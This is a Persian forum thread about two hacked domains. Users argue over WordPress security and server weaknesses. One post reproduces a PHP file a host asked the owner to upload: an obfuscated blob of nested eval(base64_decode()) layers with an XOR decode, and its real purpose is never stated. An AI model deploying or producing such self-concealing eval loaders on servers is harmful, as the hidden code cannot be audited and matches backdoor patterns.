نمایش نتایج: از شماره 1 تا 10 , از مجموع 45

موضوع: هک شدم دو تا دومینم

Hybrid View

پست قبلی پست قبلی   پست بعدی پست بعدی
    کاربر اخراج شده
    تشکر تشکر کرده 
    1
    تشکر تشکر شده 
    8
    تشکر شده در
    5 پست

پیش فرض پاسخ : هک شدم دو تا دومینم

خوشم می اد هی وردپرس بر عکس این همه گفتن مدیرانش که قدرت دست ماست و این چیزا باز هک می شه البته مشکل سرور هم باید در نظر گرفت

عضو جدید msitman آواتار ها
    تشکر تشکر کرده 
    18
    تشکر تشکر شده 
    7
    تشکر شده در
    4 پست

نقل قول نوشته اصلی توسط irhost نمایش پست ها
    خوشم می اد هی وردپرس بر عکس این همه گفتن مدیرانش که قدرت دست ماست و این چیزا باز هک می شه البته مشکل سرور هم باید در نظر گرفت
    شما بهتره جای پست دادن مطالب رو از ابتدا بخونی.
    من همچین گفته ای رو تا حالا ازمدیران وردپرس نشنیدم. اگرم همچین چیزی بوده بخاطر انعطاف پذیره این سی ام اسه که دقیقا گفته درستیه.

راستی ممنون از اینکه اینقدر حکیمانه ضعف سرور رو هم دخیل دونستی!!!
    ویرایش توسط msitman : September 12th, 2010 در ساعت 14:20

کاربر اخراج شده
    تشکر تشکر کرده 
    1
    تشکر تشکر شده 
    8
    تشکر شده در
    5 پست

نقل قول نوشته اصلی توسط msitman نمایش پست ها
    اولا که شما بهتره جای پست دادن مطالب رو از ابتدا بخونی.
    دوما یکی از همین دوستان به من لطف کرد و دیروز ناموس سرورهای زرتینا !! رو در عرض 20 دقیقه کشید بیرون.
    سوما من همچین گفته ای رو تا حالا ازمدیران وردپرس نشنیدم. اگرم همچین چیزی بوده بخاطر انعطاف پذیره این سی ام اسه که دقیقا گفته درستیه.

راستی ممنون از اینکه اینقدر حکیمانه ضعف سرور رو هم دخیل دونستی!!!
    شما هم حکیمانه می تونید سایت cms magazin بخونید طی مصاحبه ای که با مدیر وردپرس داشتند و گفتند که وردپرس سیستم بلاگ دهی نیست و یک پرتال حتی developer های wordpress هم همچین ادعایی نکردند و می توانید ببینید که چه تهمت های به نیوک مشهد زدند مبنی بر بدی این سیتم نا امن بودن و یا هرچی ....
    خوشحالم دوست من مشکلت حل شد

عضو دائم Rezash آواتار ها
    تشکر تشکر کرده 
    889
    تشکر تشکر شده 
    2,385
    تشکر شده در
    1,535 پست

نقل قول نوشته اصلی توسط irhost نمایش پست ها
    هر كي بگه ما هك نميشيم ، ما 100 درصد امنيم اگر هر كسي مي خواد باشه ، چه بزرگترين چه كوچكترين هكر دنيا بهت قول ميدم يا دروغ گويي بيش نيست يا چيز زيادي بارش نيست !‌چون بزرگترين سايت هخا دنيا با تيم هاي اكتيو 24 ساعته هم هك ميشند ، حالا يك سي ام اس هر چقدر هم حرفه اي نوشته بشه باز ممكنه توش مشكل پيش بياد
    وقتي مايكروسافت و گوگل كه دو قول بزرگ اينتنتي هستند باگ xss سوتي ميدند ، ديگه چه انتظاري از بقيه ميره !
    پ.ن :‌به ورد پرس كاري ندارم ! در كل خيلي قبولش دارم ولي خوب نيست از آب گل آلود ماهي بگيريم !‌:دي
    نقل قول نوشته اصلی توسط Talahost.Com نمایش پست ها
    لطفا یه فایل php با این برنامه کد کنید و قرار بدید.
    با تشکر
    کد PHP:
    <?php /* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */
    $o="QAAAOzh3b3cNDnRidHRuaGlYdAACc2Z1cy8uPA0NYXJpZHMBMCcAAGRoaXFidXN1YGUvJyNkaGsAoGh1Jy4NfA0nABAjAPM6J2J1YgAAYG5YdWJ3a2ZkYi8nJVxZNwA8Kj5mKmFaJSsnJQBAApQFgANgJ3UAAGJzcnVpJ2Z1dWZ+LydvYn8AEGNiZC8ndHJldHN1BkUrJzcrAfonNScuJy4rAi8HcgHwADACLwRJMwIkJ6AIB6B6DUl1YmZzYm5qZmAK4CNzYgAgf3MrJyNwbmNzbwCAb2JuYG+AQAERYWhpcyc6JzIPBmBraGVmaysgJyMBkUQQoTwQcgF1ZWABXyNrbmliiK8BeG5hJw4wbmpgBZBHCBJkCMIBUAgLDZHhVQXiFrMTgWtudHMCgFUKQEAAQEUCMDoZ+/8HCZYPEQMxAEEK9wdABzMLwWZra2hkEGAFIAjw/88FAAWIDYMD0QdPBFAhOg9kByoBRTonBw8HDwO5Bw//hwcNFRYDeRZ3AvAHTwdPA9kDAmFua2sCdSewADB5UCMMZSPQELEAQSNuBgA3EfdhMOAvJzwnm/wBgDs6JDQA4iwjgwNBAEEcVwDhH5MMkQclI27e5y8SAHEjKAYCESOyCtl6IVIEYQdAOicIzwjFBHOT/gjfJycI32BiBsEI1Q/BCQAxFgDBAgEIzwjHbwMJZGJpc2J1EeADcycoJzUSdyNxAffQbwmDAgx/A5B1aHJpYwhABLUqI9MtQTGyAbCCPgDBJy4nLSdCoGtiaQEgO8EBIAbgElkjf8d+BQgHxQUICEMD8AUUA/whEgYwbmlgAkAx4wKhr+IyUH8AQH4AQAeBAHABYRF+PkJUBVhifztwdKFgUVBORvFXSUAlCwAuE6YY229iZmNimBBQUCVER8AVICpTfndiPRCTKHdpYP8FA8AVZyBRJLMBoAqTEFkip2JrdGInCW9zCWYfxkBOQQWgToAFMQBBCW8JbwlkYG5hA8AJb2CzH2EwYQlvCW8vJxLPEsJNV0IS3wnhAEQS3xLYH5Vtd2IS7xLjAbEJnwmXH/JjYiAQaGoAIyAAkEQVdXoNZGBidXVodW7RaHVzIiJCWAH9UEZVSU5JQAJxFn8WcnYaEwAWwBZDRwGqSEwvBDF6DVsyVG59YixwMjwA8yZzOicu8yU3ABIlAXBKFQFQQQASAVE6pwFwRTcAIQFxAth0YmREaGMFESUA8EuDI0zjQyInMTwWCCcsLAEgLn3VAyUpOid1ZjmhNysnQAA+CgRYVEJUVE5ISVwgdWZ0b2WeWAKwEmAgWgrwIwDABpE8DW2TFNIW4AF0Kx4AJzA2eVAAQA5HVgA4OQ0N";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?>

---------- Post added at 06:42 PM ---------- Previous post was at 06:39 PM ----------

پ.ن : تند تايپ مي كنم ببخشيد به خاطر حجم بالاي غطل هاي املايي
    بک آپ بگیرید قبل از آنکه پشیمان شوید!
    تشخیص سیستم مدیریت محتوای سایت - سایت شخصی

5. تعداد تشکر ها از Rezash به دلیل پست مفید

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)